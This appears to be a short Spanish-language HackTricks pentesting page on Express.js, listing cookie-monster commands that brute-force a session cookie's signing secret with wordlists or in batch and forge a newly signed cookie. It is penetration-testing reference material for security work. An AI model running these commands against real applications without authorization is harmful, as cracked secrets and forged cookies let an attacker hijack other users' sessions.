hacktricks/network-services-pentesting/pentesting-web/nodejs-express.md

29 lines
930 B
Markdown

# NodeJS Express
## Firma de Cookies
La herramienta [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) es una utilidad para automatizar la prueba y re-firma de secretos de cookies de Express.js.
### Una sola cookie con un nombre específico
```bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
```
### Lista de palabras personalizada
```bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
```
### Probar múltiples cookies usando el modo por lotes
```bash
cookie-monster -b -f cookies.json
```
### Probar múltiples cookies usando el modo batch con una lista de palabras personalizada
```bash
cookie-monster -b -f cookies.json -w custom.lst
```
### Codificar y firmar una nueva cookie
Si conoces el secreto, puedes firmar la cookie.
```bash
cookie-monster -e -f new_cookie.json -k secret
```